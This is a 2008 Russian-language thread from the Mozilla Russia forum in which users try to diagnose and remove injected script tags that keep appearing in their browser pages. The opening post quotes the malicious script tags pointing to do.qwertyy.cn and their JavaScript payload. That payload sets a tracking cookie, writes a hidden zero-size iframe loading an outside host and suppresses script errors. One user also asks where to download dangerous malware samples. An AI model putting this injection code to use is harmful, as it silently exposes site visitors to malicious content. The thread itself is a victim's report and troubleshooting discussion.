подцепил какую-то заразу | Форум Mozilla Россия

>Форум Mozilla Россия
   http://forum.mozilla-russia.org/index.php
>Программы и ОС
   http://forum.mozilla-russia.org/viewforum.php?id=31
>подцепил какую-то заразу
   http://forum.mozilla-russia.org/viewtopic.php?id=27821

Dragooon > 16-11-2008 02:43:26

Это какойто Браузерный ЕКСПЛОЙТ.

появляется на разных страничках постоянно

<script language="javascript" SRC="http://do.qwertyy.cn/do.js"></script>
<script language="javascript" SRC="http://do.qwertyy.cn/do.htm"></script>
<script language="javascript" SRC="http://do.qwertyy.cn/gg.htm"></script>

вот такая фигня. NOD32 в системе ничего не находит. Только когда эта байда запускается, вставляется в страничку браузера (Firefox 3.0.3)
нод начинает ругатся.

в Opera покамись незаметил эту штуку.

внутри файла лежит вот такой код:

document.writeln("<script>");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://do.qwertyy.cn/do.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("<\/script>");
document.writeln("<script>window.onerror=function(){return true;}<\/script>")

Эта штука живёт в кукисах - тобиш чистите куки
Открываем кукисы браузера и чистим все с названием Cookie1

Нашол вроде откуда лезит эта фигня. Ко мне на комп она попадает через БАННЕРЫ. после чистки кукисов первая зловредная кука с адресом banner.kiev.ua

Заражаюсь сразуже кактолько захожу фаерфоксом на какойто сайт с банерами УБС. Далее если кука висит она автоматом запускается если открываеш какойнибудь другой сайт.

Избавится от банеров сложно - сделовательно ждём обновлений фаерфокса... Кстате в Firefox версии 3,0,4 эта дыра присуцтвует.

fredperry > 16-11-2008 06:24:34

чищу кукисы и ничего не происходит.

всё так же лезет qwertyy

ZohaN > 16-11-2008 08:52:21

у меня небыло такого.. пока

Shutnik > 16-11-2008 10:07:22

в этом скрипте нет никакого эксплоита, он просто ворует куки.
на каких страницах это проявляется?

Const2008 > 16-11-2008 10:25:12

Засада!
Он и оперу и мозилу попал у меня.
Мозила как то предохраняеться, путем блокировки страницы, а опера тупо грузит его.

Короче только explorer пока в живых остался.
Кукисы и там и там почистил, кэш также очистел. Непомогает
Что делать, кто знает?

Shutnik > 16-11-2008 10:35:17

Что делать, кто знает?

лечиться от вирусов, браузеры тут не при чём

sks23 > 16-11-2008 10:39:50

Это ARP spoofing.
http://fahryhadikusumo.wordpress.com/tag/arp-spoofing-solution/
http://forum.kaspersky.com/index.php?showtopic=58061&st=60
http://forum.kaspersky.com/index.php?showtopic=87668&st=60&start=60

!gOR > 16-11-2008 11:33:49

Если я пользуюсь ФФ+noScript, я заразиться не могу? Ведь не разрешаю скриптам выполняться на незнакомых сайтах?

Vet0489 > 16-11-2008 11:45:47

народ....тоже самое.....сначала подхвотил вот эту фигню.... точнее зашел случайно на нее когда чрез эксплорер лазел пришлось винду пеерставить......переставил поставил avast и теперь заходя на сайт любой выскакивает окошко от avast о том что он заблакикровал соединение с этим сайтом.....кто нибудь знает что делать то ?

lump > 16-11-2008 14:32:51

а кто нить знает где можно закачать архивчик со свежими и опасными тараканами? гугль находит только DOSовское старьё. всёравно скоро винду сносить, апгрейд мамы-проца-оперативки

Dragooon > 16-11-2008 17:53:57

Заблокировал эти 2 IP

122.224.4.140
222.216.28.25

непомогает!

George Yves > 16-11-2008 18:37:17

Shutnik пишет

в этом скрипте нет никакого эксплоита, он просто ворует куки.

А что говорит ваш антишпион, уважаемый Dragooon?

Dragooon > 16-11-2008 18:40:32

George Yves - молчит он. на кампе заразы явно нету. Заражен какой то компьютер в сети (баннерная сеть) и между например двумя ПК появляется некий зараженный посредник который модифицирует трафик добавляя в код который записывает куку в браузер после чего кука вставляет ифрейм.

Проблему нужно искать в сети. Думаю этот прикол не скоро найдут.

Shutnik - в данном коде эксплоита нету. Но тогда КАКИМ образом експлоит попадает на комп через браузер Firefox? ведь в опере у меня эта байда не вылазит и кука не пишется!

появляется на ресурсах где есть баннера
banner[dot]kiev[dot]ua
gala[dot]net

Erik > 17-11-2008 06:19:50

Dragooon, а не проще ли адблоком вырезать эти баннеры нафиг?

P.S. выражаю сочувствие по поводу заразы и все такое...

Shutnik > 17-11-2008 14:52:39

Dragooon пишет

Но тогда КАКИМ образом експлоит попадает на комп через браузер Firefox?

он уже давно попал в него. рекомендую для начала попробовать новый профиль и перестановку браузера